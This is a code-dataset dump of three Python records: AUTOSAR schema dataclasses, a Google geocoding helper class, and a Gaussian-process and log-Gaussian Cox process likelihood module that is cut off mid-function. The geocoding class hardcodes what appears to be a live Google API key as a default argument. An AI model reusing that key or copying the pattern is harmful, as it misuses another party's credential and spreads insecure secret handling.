@dataclass\n class ConsistencyNeedss:\n consistency_needs: List[ConsistencyNeeds] = field(\n default_factory=list,\n metadata={\n \"name\": \"CONSISTENCY-NEEDS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class Ports:\n p_port_prototype: List[PPortPrototype] = field(\n default_factory=list,\n metadata={\n \"name\": \"P-PORT-PROTOTYPE\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n pr_port_prototype: List[PrPortPrototype] = field(\n default_factory=list,\n metadata={\n \"name\": \"PR-PORT-PROTOTYPE\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n r_port_prototype: List[RPortPrototype] = field(\n default_factory=list,\n metadata={\n \"name\": \"R-PORT-PROTOTYPE\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class PortGroups:\n port_group: List[PortGroup] = field(\n default_factory=list,\n metadata={\n \"name\": \"PORT-GROUP\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class UnitGroupRefs:\n unit_group_ref: List[\"CompositionSwComponentType.UnitGroupRefs.UnitGroupRef\"] = field(\n default_factory=list,\n metadata={\n \"name\": \"UNIT-GROUP-REF\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class UnitGroupRef(Ref):\n dest: Optional[UnitGroupSubtypesEnum] = field(\n default=None,\n metadata={\n \"name\": \"DEST\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n\n @dataclass\n class Components:\n sw_component_prototype: List[SwComponentPrototype] = field(\n default_factory=list,\n metadata={\n \"name\": \"SW-COMPONENT-PROTOTYPE\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class Connectors:\n assembly_sw_connector: List[AssemblySwConnector] = field(\n default_factory=list,\n metadata={\n \"name\": \"ASSEMBLY-SW-CONNECTOR\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n delegation_sw_connector: List[DelegationSwConnector] = field(\n default_factory=list,\n metadata={\n \"name\": \"DELEGATION-SW-CONNECTOR\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n pass_through_sw_connector: List[PassThroughSwConnector] = field(\n default_factory=list,\n metadata={\n \"name\": \"PASS-THROUGH-SW-CONNECTOR\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class ConstantValueMappingRefs:\n constant_value_mapping_ref: List[\"CompositionSwComponentType.ConstantValueMappingRefs.ConstantValueMappingRef\"] = field(\n default_factory=list,\n metadata={\n \"name\": \"CONSTANT-VALUE-MAPPING-REF\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class ConstantValueMappingRef(Ref):\n dest: Optional[ConstantSpecificationMappingSetSubtypesEnum] = field(\n default=None,\n metadata={\n \"name\": \"DEST\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n\n @dataclass\n class DataTypeMappingRefs:\n data_type_mapping_ref: List[\"CompositionSwComponentType.DataTypeMappingRefs.DataTypeMappingRef\"] = field(\n default_factory=list,\n metadata={\n \"name\": \"DATA-TYPE-MAPPING-REF\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class DataTypeMappingRef(Ref):\n dest: Optional[DataTypeMappingSetSubtypesEnum] = field(\n default=None,\n metadata={\n \"name\": \"DEST\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n\n @dataclass\n class InstantiationRteEventPropss:\n instantiation_timing_event_props: List[InstantiationTimingEventProps] = field(\n default_factory=list,\n metadata={\n \"name\": \"INSTANTIATION-TIMING-EVENT-PROPS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n","sub_path":"autosar/models/composition_sw_component_type.py","file_name":"composition_sw_component_type.py","file_ext":"py","file_size_in_byte":24494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"263406461","text":"import json\nimport requests\nimport re\n\nclass Geocode_Location:\n\n def __init__(self, google_api_key = \"AIzaSyD9uzu87hhGsu6Wh7C2-7F8tO2WIWWA5bY\") :\n self.google_api_key = google_api_key\n self.location_keywords = []\n self.ids = []\n self.locations = []\n \n def get_location_keywords(self) :\n return self.location_keywords\n\n def get_locations(self) :\n return self.locations\n \n def load_locations_countires(self, locations, countries) :\n for location in locations :\n self.send_request(location)\n \n for location in countries :\n self.send_request(location)\n\n def send_request(self, location) :\n location = location.lower()\n if location in self.location_keywords :\n return\n ignore_pure_number = re.search(\"^[^a-zA-Z]+$\", location)\n if ignore_pure_number == None :\n self.location_keywords.append(location)\n else :\n return\n location = location.replace(\" \",\"+\")\n url = 'https://maps.googleapis.com/maps/api/geocode/json?address=' + location + '&key=' + self.google_api_key\n response = requests.get(url)\n if response.status_code == 200 :\n result = json.loads(response.text)\n if result[\"status\"] != \"OK\" :\n return\n for obj in result[\"results\"][0][\"address_components\"] :\n temp = obj[\"long_name\"].lower()\n ignore_pure_number = re.search(\"^[^a-zA-Z]+$\",temp)\n if ignore_pure_number != None :\n continue\n if temp not in self.location_keywords :\n self.location_keywords.append(temp)\n temp = obj[\"short_name\"].lower()\n ignore_pure_number = re.search(\"^[^a-zA-Z]+$\",temp)\n if ignore_pure_number != None :\n continue\n if temp not in self.location_keywords :\n self.location_keywords.append(temp)\n dic = {}\n dic[\"google_id\"] = result[\"results\"][0][\"place_id\"]\n if dic[\"google_id\"] in self.ids:\n return\n dic[\"address\"] = result[\"results\"][0][\"formatted_address\"]\n self.ids.append(dic[\"google_id\"])\n self.locations.append(dic)","sub_path":"Backend/NLP_PhaseMatcher_version/Geocode_Location.py","file_name":"Geocode_Location.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"466083943","text":"import pandas as pd\nimport math\nimport matplotlib\nimport numpy as np\nimport functions as fn\nimport time\nimport scipy.special as scispec\nimport scipy.optimize as scopt\n\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndef poisson_cont(k, landa): # to allow for non-integer k values\n numerator_p = np.power(landa, k) * np.exp(-1 * landa)\n denominator_p = scispec.gamma(k + 1) # Generalised factorial function for non-integer k values\n # if argument into gamma function is 0, the output is a zero as well, but 0! = 1\n p = numerator_p / denominator_p\n return p\n\n\ndef poisson_product(k_array, landa_array):\n \"\"\"Takes in 2 arrays of equal size, and takes product of poisson distributions\"\"\"\n quadrats = len(k_array) # define the number of quadrats in total\n prob_array = np.zeros(quadrats)\n\n if landa_array.size == 1:\n for i in range(len(k_array)):\n prob_array[i] = poisson_cont(k_array[i], landa_array)\n else:\n if len(k_array) == len(landa_array):\n for i in range(len(prob_array)):\n prob_array[i] = poisson_cont(k_array[i], landa_array[i])\n else:\n print('Length Mismatch')\n p_likelihood = np.prod(prob_array) # Taking combined product of distributions - leading to small values\n # Note output is a scalar (singular value)\n return p_likelihood # Returns the non logarithmic version.\n\n\ndef log_special(array):\n \"\"\"Taking an element-wise natural log of the array, retain array dimensions\"\"\"\n \"\"\"with the condition that log(0) = 0, so there are no -inf elements\"\"\"\n log_array = np.zeros(array.size)\n for i in range(array.size):\n if array[i] == 0:\n log_array[i] = 0\n else:\n log_array[i] = np.log(array[i])\n return log_array\n\n\ndef mean_func_zero(c): # Prior mean function taken as 0 for the entire sampling range\n if np.array([c.shape]).size == 1:\n mean_c = np.ones(1) * 0 # Make sure this is an array\n else:\n mean_c = np.ones(c.shape[1]) * 0\n return mean_c # Outputs a x and y coordinates, created from the mesh grid\n\n\ndef mean_func_scalar(mean, c): # Assume that the prior mean is a constant to be optimised\n if np.array([c.shape]).size == 1:\n mean_c = np.ones(1) * mean\n else:\n mean_c = np.ones(c.shape[1]) * mean\n return mean_c\n\n\ndef squared_exp_2d(sigma_exp, length_exp, x1, x2): # Only for 2-D\n \"\"\"\n Generates a covariance matrix using chosen hyper-parameters and coordinates to iterate over\n :param sigma_exp: coefficient factor\n :param length_exp: length scale\n :param x1: First set of coordinates to iterate over\n :param x2: Second set of coordinates to iterate over\n :return: Covariance Matrix with squared-exp kernel\n \"\"\"\n # To allow the function to take in x1 and x2 of various dimensions\n if np.array([x1.shape]).size == 1 and np.array([x2.shape]).size != 1 and x1.size == x2.shape[0]:\n rows = 1\n columns = x2.shape[1]\n elif np.array([x2.shape]).size == 1 and np.array([x1.shape]).size != 1 and x2.size == x1.shape[0]:\n rows = x1.shape[1]\n columns = 1\n elif np.array([x1.shape]).size == 1 and np.array([x2.shape]).size == 1 and x1.size == x2.size:\n rows = 1\n columns = 1\n else:\n rows = x1.shape[1]\n columns = x2.shape[1]\n\n c = np.zeros((rows, columns))\n\n for i in range(c.shape[0]):\n for j in range(c.shape[1]):\n if np.array([x1.shape]).size == 1 and np.array([x2.shape]).size != 1:\n diff = x1 - x2[:, j]\n elif np.array([x1.shape]).size != 1 and np.array([x2.shape]).size == 1:\n diff = x1[:, i] - x2\n elif np.array([x1.shape]).size == 1 and np.array([x2.shape]).size == 1:\n diff = x1 - x2\n else:\n diff = x1[:, i] - x2[:, j]\n\n euclidean = np.sqrt(np.matmul(diff, np.transpose(diff)))\n exp_power = np.exp(-1 * (euclidean ** 2) * (length_exp ** -2))\n c[i, j] = (sigma_exp ** 2) * exp_power\n\n return c # Note that this creates the covariance matrix directly\n\n\ndef matern_2d(v_value, sigma_matern, length_matern, x1, x2): # there are only two variables in the matern function\n \"\"\"\n Creating the covariance matrix from chosen hyper-parameters and the coordinates the iterate over\n :param v_value: the matern factor miu: 1/2 or 3/2\n :param sigma_matern: coefficient factor at the front\n :param length_matern: length scale\n :param x1: First set of coordinates for iteration\n :param x2: Second set of coordinates for iteration\n :return: Covariance matrix with matern kernel\n \"\"\"\n # To allow the function to take in x1 and x2 of various dimensions\n if np.array([x1.shape]).size == 1 and np.array([x2.shape]).size != 1 and x1.size == x2.shape[0]:\n rows = 1\n columns = x2.shape[1]\n elif np.array([x2.shape]).size == 1 and np.array([x1.shape]).size != 1 and x2.size == x1.shape[0]:\n rows = x1.shape[1]\n columns = 1\n elif np.array([x1.shape]).size == 1 and np.array([x2.shape]).size == 1 and x1.size == x2.size:\n rows = 1\n columns = 1\n else:\n rows = x1.shape[1]\n columns = x2.shape[1]\n\n c = np.zeros((rows, columns))\n\n if v_value == 1/2:\n for i in range(c.shape[0]):\n for j in range(c.shape[1]):\n if np.array([x1.shape]).size == 1 and np.array([x2.shape]).size != 1:\n diff = x1 - x2[:, j]\n elif np.array([x1.shape]).size != 1 and np.array([x2.shape]).size == 1:\n diff = x1[:, i] - x2\n elif np.array([x1.shape]).size == 1 and np.array([x2.shape]).size == 1:\n diff = x1 - x2\n else:\n diff = x1[:, i] - x2[:, j]\n\n euclidean = np.sqrt(np.matmul(diff, np.transpose(diff)))\n exp_term = np.exp(-1 * euclidean * (length_matern ** -1))\n c[i, j] = (sigma_matern ** 2) * exp_term\n\n if v_value == 3/2:\n for i in range(c.shape[0]):\n for j in range(c.shape[1]):\n if np.array([x1.shape]).size == 1 and np.array([x2.shape]).size != 1:\n diff = x1 - x2[:, j]\n elif np.array([x1.shape]).size != 1 and np.array([x2.shape]).size == 1:\n diff = x1[:, i] - x2\n elif np.array([x1.shape]).size == 1 and np.array([x2.shape]).size == 1:\n diff = x1 - x2\n else:\n diff = x1[:, i] - x2[:, j]\n\n euclidean = np.sqrt(np.matmul(diff, np.transpose(diff)))\n coefficient_term = (1 + np.sqrt(3) * euclidean * (length_matern ** -1))\n exp_term = np.exp(-1 * np.sqrt(3) * euclidean * (length_matern ** -1))\n c[i, j] = (sigma_matern ** 2) * coefficient_term * exp_term\n return c\n\n\n# This is way faster than the function above beyond n=10\ndef fast_matern_2d(sigma_matern, length_matern, x1, x2): # there are only two variables in the matern function\n \"\"\"\n This is much much faster than iteration over every point beyond n = 10. This function takes advantage of the\n symmetry in the covariance matrix and allows for fast regeneration. For this function, v = 3/2\n :param sigma_matern: coefficient factor at the front\n :param length_matern: length scale\n :param x1: First set of coordinates for iteration\n :param x2: Second set of coordinates for iteration\n :return: Covariance matrix with matern kernel\n \"\"\"\n # Note that this function only takes in 2-D coordinates, make sure there are 2 rows and n columns\n n = x1.shape[1]\n cov_matrix = np.zeros((n, n))\n for i in range(n):\n cov_matrix[i, i] = sigma_matern ** 2\n for j in range(i + 1, n):\n diff = x1[:, i] - x2[:, j]\n euclidean = np.sqrt(np.matmul(diff, np.transpose(diff)))\n coefficient_term = (1 + np.sqrt(3) * euclidean * (length_matern ** -1))\n exp_term = np.exp(-1 * np.sqrt(3) * euclidean * (length_matern ** -1))\n cov_matrix[i, j] = (sigma_matern ** 2) * coefficient_term * exp_term\n cov_matrix[j, i] = cov_matrix[i, j]\n\n return cov_matrix\n\n\ndef fast_matern_1_2d(sigma_matern, length_matern, x1, x2):\n \"\"\"\n Much faster method of obtaining the Matern v=1/2 covariance matrix by exploiting the symmetry of the\n covariance matrix. This is the once-differentiable (zero mean squared differentiable) matern\n :param sigma_matern: Coefficient at the front\n :param length_matern: Length scale\n :param x1: First set of coordinates for iteration\n :param x2: Second set of coordinates for iteration\n :return: Covariance matrix with matern kernel\n \"\"\"\n # Note that this function only takes in 2-D coordinates, make sure there are 2 rows and n columns\n n = x1.shape[1]\n cov_matrix = np.zeros((n, n))\n for i in range(n):\n cov_matrix[i, i] = sigma_matern ** 2\n for j in range(i + 1, n):\n diff = x1[:, i] - x2[:, j]\n euclidean = np.sqrt(np.matmul(diff, np.transpose(diff)))\n exp_term = np.exp(-1 * euclidean * (length_matern ** -1))\n cov_matrix[i, j] = (sigma_matern ** 2) * exp_term\n cov_matrix[j, i] = cov_matrix[i, j]\n\n return cov_matrix\n\n\ndef fast_squared_exp_2d(sigma_exp, length_exp, x1, x2): # there are only two variables in the matern function\n \"\"\"\n This is much much faster than iteration over every point beyond n = 10. This function takes advantage of the\n symmetry in the covariance matrix and allows for fast regeneration.\n :param sigma_exp: coefficient factor at the front\n :param length_exp: length scale\n :param x1: First set of coordinates for iteration\n :param x2: Second set of coordinates for iteration\n :return: Covariance matrix with squared exponential kernel - indicating infinite differentiability\n \"\"\"\n # Note that this function only takes in 2-D coordinates, make sure there are 2 rows and n columns\n n = x1.shape[1]\n cov_matrix = np.zeros((n, n))\n for i in range(n):\n cov_matrix[i, i] = sigma_exp ** 2\n for j in range(i + 1, n):\n diff = x1[:, i] - x2[:, j]\n euclidean = np.sqrt(np.matmul(diff, np.transpose(diff)))\n exp_power = np.exp(-1 * (euclidean ** 2) * (length_exp ** -2))\n cov_matrix[i, j] = (sigma_exp ** 2) * exp_power\n cov_matrix[j, i] = cov_matrix[i, j]\n\n return cov_matrix\n\n\ndef fast_rational_quadratic_2d(alpha_rq, length_rq, x1, x2):\n \"\"\"\n Rational Quadratic Coveriance function with 2 parameters to be optimized, using\n power alpha and length scale l. The Rational Quadratic Kernel is used to model the\n volatility of equity index returns, which is equivalent to a sum of Squared\n Exponential Kernels. This kernel is used to model multi-scale data\n\n This is a fast method of generating the rational quadratic kernel, by exploiting the symmetry\n of the covariance matrix\n :param alpha_rq: power and denominator\n :param length_rq: length scale\n :param x1: First set of coordinates for iteration\n :param x2: Second set of coordinates for iteration\n :return: Covariance matrix with Rational Quadratic Kernel\n \"\"\"\n # Note that this function only takes in 2-D coordinates, make sure there are 2 rows and n columns\n n = x1.shape[1]\n covariance_matrix = np.zeros((n, n))\n for i in range(n):\n covariance_matrix[i, i] = 1\n for j in range(i + 1, n):\n diff = x1[:, i] - x2[:, j]\n euclidean_squared = np.matmul(diff, np.transpose(diff))\n fraction_term = euclidean_squared / (2 * alpha_rq * (length_rq ** 2))\n covariance_matrix[i, j] = (1 + fraction_term) ** (-1 * alpha_rq)\n covariance_matrix[j, i] = covariance_matrix[i, j]\n\n return covariance_matrix\n\n\ndef log_model_evidence(param, *args):\n \"\"\"\n ***NOTE THIS IS FOR STANDARD GP REGRESSION - DO NOT USE FOR LGCP. THIS FUNCTION ASSUMES THAT THE LATENT INTENSITY IS\n THE SAME AS THE DATA SET. HENCE, OVER HERE, WE TAKE (y_i - u_i) instead of (v_i - u_i) as the difference for the\n calculation of the euclidean\n\n :param param: sigma, length scale and noise hyper-parameters\n :param args: inputs into the function (from dataset and elsewhere)\n :return: The log-Model evidence\n \"\"\"\n sigma = param[0]\n length = param[1]\n noise = param[2] # Over here we have defined each parameter in the tuple, include noise\n scalar_mean = param[3]\n xy_coordinates = args[0] # This argument is a constant passed into the function\n histogram_data = args[1] # Have to enter histogram data as well\n prior_mu = mean_func_scalar(scalar_mean, xy_coordinates) # This creates a matrix with 2 rows\n c_auto = fast_matern_2d(sigma, length, xy_coordinates, xy_coordinates)\n # c_auto = squared_exp_2d(sigma, length, xy_coordinates, xy_coordinates)\n c_noise = np.eye(c_auto.shape[0]) * (noise ** 2) # Fro-necker delta function\n c_auto_noise = c_auto + c_noise # Overall including noise, plus include any other combination\n model_fit = - 0.5 * fn.matmulmul(histogram_data - prior_mu, np.linalg.inv(c_auto_noise),\n np.transpose(histogram_data - prior_mu))\n model_complexity = - 0.5 * (math.log(np.linalg.det(c_auto_noise)))\n model_constant = - 0.5 * len(histogram_data) * math.log(2*np.pi)\n log_model_evid = model_fit + model_complexity + model_constant\n return -log_model_evid # We want to maximize the log-likelihood, meaning the min of negative log-likelihood\n\n\ndef log_integrand_without_v(param, *args):\n \"\"\"\n 1. Tabulates the log of the integrand, g(v), so that we can optimise for v_array and hyper-parameters\n The log of the integrand, log[g(v)] is used as log function is monotonically increasing - so they have the same\n optimal points - note we want to maximize the integrand\n 2. Note here that because the LGCP model is doubly stochastic, the log-intensities are meant to be optimized]\n 3. Kernel: Matern(3/2)\n :param param: v_array, hyperparameters - sigma, length scale and noise, prior scalar mean\n :param args: xy coordinates for iteration, data set k_array, matern factor value = 1/2 or 3/2\n :return: the log of the integrand, log[g(v)], so that we can optimise and find best hyperparameters and vhap\n \"\"\"\n # Generate Matern Covariance Matrix\n # Enter parameters\n sigma = param[0]\n length = param[1]\n noise = param[2]\n scalar_mean = param[3]\n v_array = param[4:] # Concatenate v_array behind the hyper-parameters\n\n # Enter Arguments\n xy_coordinates = args[0]\n k_array = args[1]\n prior_mean = mean_func_scalar(scalar_mean, xy_coordinates)\n c_auto = fast_matern_2d(sigma, length, xy_coordinates, xy_coordinates)\n c_noise = np.eye(c_auto.shape[0]) * (noise ** 2) # Fro-necker delta function\n cov_matrix = c_auto + c_noise\n\n \"\"\"Generate Objective Function = log[g(v)]\"\"\"\n exp_term = -1 * np.sum(np.exp(v_array))\n product_term = np.matmul(v_array, np.transpose(k_array))\n det_term = -0.5 * np.log(2 * np.pi * np.linalg.det(cov_matrix))\n\n factorial_k = scispec.gamma(k_array + 1)\n factorial_term = - np.sum(np.log(factorial_k))\n\n v_difference = v_array - prior_mean\n euclidean_term = -0.5 * fn.matmulmul(v_difference, np.linalg.inv(cov_matrix), np.transpose(v_difference))\n\n \"\"\"Summation of all terms change to correct form to find minimum point\"\"\"\n log_g = exp_term + product_term + det_term + factorial_term + euclidean_term\n log_g_minimization = -1 * log_g\n return log_g_minimization\n\n\ndef log_integrand_with_v(param, *args):\n \"\"\"\n 1. Tabulates the log of the integrand, g(v), so that we can optimise for the GP hyper-parameters given\n having optimised for the v_array. The v_array will now be entered as an argument into the objective function.\n The log of the integrand, log[g(v)] is used as log function is monotonically increasing - so they have the same\n optimal points - note we want to maximize the integrand\n\n 2. Note here that because the LGCP model is doubly stochastic, the log-intensities are meant to be optimized]\n\n 3. Kernel: Matern(3/2)\n :param param: v_array, hyperparameters - sigma, length scale and noise, prior scalar mean\n :param args: xy coordinates for iteration, data set k_array, matern factor value = 1/2 or 3/2\n :return: the log of the integrand, log[g(v)], so that we can optimise and find best hyperparameters and vhap\n\n *** Note that this objective function is currently problematic - advised to not use it ***\n \"\"\"\n # Generate Matern Covariance Matrix\n # Enter parameters\n sigma = param[0]\n length = param[1]\n noise = param[2]\n scalar_mean = param[3]\n\n # Enter Arguments\n xy_coordinates = args[0]\n k_array = args[1]\n v_array = args[2] # Note that this is refers to the optimised log-intensity array\n prior_mean = mean_func_scalar(scalar_mean, xy_coordinates)\n c_auto = fast_matern_2d(sigma, length, xy_coordinates, xy_coordinates)\n c_noise = np.eye(c_auto.shape[0]) * (noise ** 2) # Fro-necker delta function\n cov_matrix = c_auto + c_noise\n\n \"\"\"Generate Objective Function = log[g(v)]\"\"\"\n exp_term = -1 * np.sum(np.exp(v_array))\n product_term = v_array * k_array\n det_term = -0.5 * np.log(2 * np.pi * np.linalg.det(cov_matrix))\n\n factorial_k = scispec.gamma(k_array + 1)\n factorial_term = - np.sum(np.log(factorial_k))\n\n v_difference = v_array - prior_mean\n euclidean_term = -0.5 * fn.matmulmul(v_difference, np.linalg.inv(cov_matrix), np.transpose(v_difference))\n\n \"\"\"Summation of all terms change to correct form to find minimum point\"\"\"\n log_g = exp_term + product_term + det_term + factorial_term + euclidean_term\n log_g_minimization = -1 * log_g\n return log_g_minimization\n\n\ndef short_log_integrand_v(param, *args):\n \"\"\"\n 1. Shorter version that tabulates only the log of the GP prior behind the Poisson distribution. Includes only terms\n containing the covariance matrix elements that are made up of the kernel hyper-parameters\n 2. Kernel: Matern 3/2, Matern 1/2, Squared Exponential and Rational Quadratic Kernels\n 3. Assume a constant latent intensity, even at locations without any incidences\n :param param: hyperparameters - sigma, length scale and noise, prior scalar mean - array of 4 elements\n :param args: xy coordinates for input into the covariance function and the optimised v_array\n :return: the log of the GP Prior, log[N(prior mean, covariance matrix)]\n \"\"\"\n # Generate Matern Covariance Matrix\n # Enter parameters\n sigma = param[0]\n length = param[1]\n noise = param[2]\n scalar_mean = param[3]\n\n # Enter Arguments\n xy_coordinates = args[0]\n v_array = args[1] # Note that this is refers to the optimised log-intensity array\n kernel_choice = args[2]\n\n # The Covariance Matrix and Prior mean are created here as a component of the objective function\n prior_mean = mean_func_scalar(scalar_mean, xy_coordinates)\n\n # Select Kernel and Construct Covariance Matrix\n if kernel_choice == 'matern3':\n c_auto = fast_matern_2d(sigma, length, xy_coordinates, xy_coordinates)\n elif kernel_choice == 'matern1':\n c_auto = fast_matern_1_2d(sigma, length, xy_coordinates, xy_coordinates)\n elif kernel_choice == 'squared_exponential':\n c_auto = fast_squared_exp_2d(sigma, length, xy_coordinates, xy_coordinates)\n elif kernel_choice == 'rational_quad':\n c_auto = fast_rational_quadratic_2d(sigma, length, xy_coordinates, xy_coordinates)\n else:\n c_auto = fast_matern_2d(sigma, length, xy_coordinates, xy_coordinates)\n\n c_noise = np.eye(c_auto.shape[0]) * (noise ** 2) # Fro-necker delta function\n cov_matrix = c_auto + c_noise\n\n \"\"\"Generate Objective Function = log[g(v)]\"\"\"\n\n # Generate Determinant Term (after taking log)\n determinant = np.exp(np.linalg.slogdet(cov_matrix))[1]\n det_term = -0.5 * np.log(2 * np.pi * determinant)\n\n # Generate Euclidean Term (after taking log)\n v_difference = v_array - prior_mean\n inv_covariance_matrix = np.linalg.inv(cov_matrix)\n euclidean_term = -0.5 * fn.matmulmul(v_difference, inv_covariance_matrix, np.transpose(v_difference))\n\n \"\"\"Summation of all terms change to correct form to find minimum point\"\"\"\n log_gp = det_term + euclidean_term\n log_gp_minimization = -1 * log_gp # Make the function convex for minimization\n return log_gp_minimization\n\n\ndef log_poisson_likelihood_opt(param, *args):\n \"\"\"\n Considers only the log-likelihood of the Poisson distribution in front of the gaussian process to optimize\n latent values - note that there are no hyper-parameters here to consider. The log-likelhood is taken as\n the natural log is monotically increasing\n :param param: v_array containing the latent intensities\n :param args: k_array which is the data set\n :return: log of the combined poisson distributions\n \"\"\"\n # Define parameters and arguments\n v_array = param\n k_array = args[0]\n\n # Generate Objective Function: log(P(D|v))\n exp_term = -1 * np.sum(np.exp(v_array))\n product_term = np.matmul(v_array, np.transpose(k_array))\n\n factorial_k = scispec.gamma(k_array + np.ones_like(k_array))\n # factorial_term = - np.sum(np.log(factorial_k)) # summation of logs = log of product\n factorial_term = - np.sum(fn.log_special(factorial_k)) # summation of logs = log of product\n\n log_p_likelihood = exp_term + product_term + factorial_term\n log_p_likelihood_convex = -1 * log_p_likelihood\n return log_p_likelihood_convex\n\n\ndef gradient_log_likelihood(param, *args):\n \"\"\"\n Construct gradient vector of the log-likelihood for optimization\n :param param: v_array (log of the latent intensities)\n :param args: k_array (the data set)\n :return: gradient vector of size n\n \"\"\"\n # Define parameters and arguments\n v_array = param\n k_array = args[0]\n\n # Construct Gradient Vector\n exp_component = -1 * np.exp(v_array)\n k_component = k_array\n grad_vector = exp_component + k_component\n grad_vector_convex = -1 * grad_vector\n return grad_vector_convex\n\n\ndef hessianproduct_log_likelihood(param, *args):\n \"\"\"\n Generates vector containing the hessian_product along each variable direction\n :param param: v_array containing the latent intensities\n :param args: tuple containing (k_array, p_array) - note this tuple taken into every function/derivative in the\n optimization\n :return: vector containing the hessian product, which is the hessian matrix multiplied by an arbitrary vector p\n \"\"\"\n # Define parameters and arguments\n v_array = param\n p_array = args[1]\n # Generate Hessian Product without creating the hessian\n exp_v_array = np.exp(v_array)\n hessian_product = -1 * exp_v_array * p_array\n hessian_product_convex = -1 * hessian_product\n return hessian_product_convex\n\n\ndef short_log_integrand_data(param, *args):\n \"\"\"\n 1. Shorter version that tabulates only the log of the GP prior. Includes only terms\n containing the covariance matrix elements that are made up of the kernel hyper-parameters\n 2. Kernel: Matern(3/2), Matern(1/2), Squared Exponential\n 3. Assume a constant latent intensity, even at locations without any incidences\n :param param: hyperparameters - sigma, length scale and noise, prior scalar mean - array of 4 elements\n :param args: xy coordinates for input into the covariance function and the histogram\n :return: the log of the GP Prior, log[N(prior mean, covariance matrix)]\n \"\"\"\n # Generate Matern Covariance Matrix\n # Enter parameters\n sigma = param[0]\n length = param[1]\n noise = param[2]\n scalar_mean = param[3]\n\n # Enter Arguments - entered as a tuple\n xy_coordinates = args[0]\n data_array = args[1] # Note that this is refers to the optimised log-intensity array\n kernel = args[2]\n\n # Set up inputs for generation of objective function\n p_mean = mean_func_scalar(scalar_mean, xy_coordinates)\n\n # Change_Param - change kernel by setting cases\n if kernel == 'matern3':\n c_auto = fast_matern_2d(sigma, length, xy_coordinates, xy_coordinates)\n elif kernel == 'matern1':\n c_auto = fast_matern_1_2d(sigma, length, xy_coordinates, xy_coordinates)\n elif kernel == 'squared_exponential':\n c_auto = fast_squared_exp_2d(sigma, length, xy_coordinates, xy_coordinates)\n elif kernel == 'rational_quad':\n c_auto = fast_rational_quadratic_2d(sigma, length, xy_coordinates, xy_coordinates)\n else: # Default kernel is matern1\n c_auto = np.eye(data_array.shape[1])\n print('Check for Appropriate Kernel')\n\n c_noise = np.eye(c_auto.shape[0]) * (noise ** 2) # Fro-necker delta function\n cov_matrix = c_auto + c_noise\n\n \"\"\"Generate Objective Function = log[g(v)]\"\"\"\n # Generate Determinant Term (after taking log)\n determinant = np.exp(np.linalg.slogdet(cov_matrix))[1]\n det_term = -0.5 * np.log(2 * np.pi * determinant)\n\n # Generate Euclidean Term (after taking log)\n data_diff = data_array - p_mean\n inv_covariance_matrix = np.linalg.inv(cov_matrix)\n euclidean_term = -0.5 * fn.matmulmul(data_diff, inv_covariance_matrix, data_diff)\n\n \"\"\"Summation of all terms change to correct form to find minimum point\"\"\"\n log_gp = det_term + euclidean_term\n log_gp_minimization = -1 * log_gp # Make the function convex for minimization\n return log_gp_minimization\n\n\ndef rotation_likelihood_opt(param, *args):\n \"\"\"\n Objective is to find the angle of rotation that gives the greatest log-likelihood, based on a\n standard GP regression. It would be a same assumption that the same optimal angle will be obtained using both\n standard GP regression and the LGCP. Over here, we do not need to tabulate the posterior so that saves time.\n\n We are taking the xy_data which is already boxed and a single year will be taken\n\n :param param: angle of rotation in degrees - note there is only one parameter to optimize\n :param args: xy_data, center, kernel form (this is a tuple), regression window\n :return: log marginal likelihood based on the standard GP process\n \"\"\"\n angle = param\n\n # convert angle to radians\n radians = (angle / 180) * np.pi\n\n # Unpack Param Tuple\n center = args[0]\n kernel = args[1]\n n_quads = args[2]\n xy_coordinates = args[3] # Make this a tuple, so it will be a tuple within a tuple\n regression_window = args[4] # This is an array - x_upper, x_lower, y_upper and y_lower\n\n # Define regression window\n x_upper_box = regression_window[0]\n x_lower_box = regression_window[1]\n y_upper_box = regression_window[2]\n y_lower_box = regression_window[3]\n\n # Break up xy_coordinates into x and y\n x_coordinates = xy_coordinates[0]\n y_coordinates = xy_coordinates[1]\n\n # Define Boolean Variable for Scatter Points Selection\n x_range_box = (x_coordinates > x_lower_box) & (x_coordinates < x_upper_box)\n y_range_box = (y_coordinates > y_lower_box) & (y_coordinates < y_upper_box)\n\n # Obtain data points within the regression window\n x_coordinates = x_coordinates[x_range_box & y_range_box]\n y_coordinates = y_coordinates[x_range_box & y_range_box]\n\n # Stack x and y coordinates\n xy_within_box = np.vstack((x_coordinates, y_coordinates))\n\n # Perform rotation using simple steps\n rotation_mat = np.array([[np.cos(radians), - np.sin(radians)], [np.sin(radians), np.cos(radians)]])\n rotation_mat = np.hstack((rotation_mat[0], rotation_mat[1]))\n print(rotation_mat.shape)\n x_within_box = xy_within_box[0] - center[0]\n y_within_box = xy_within_box[1] - 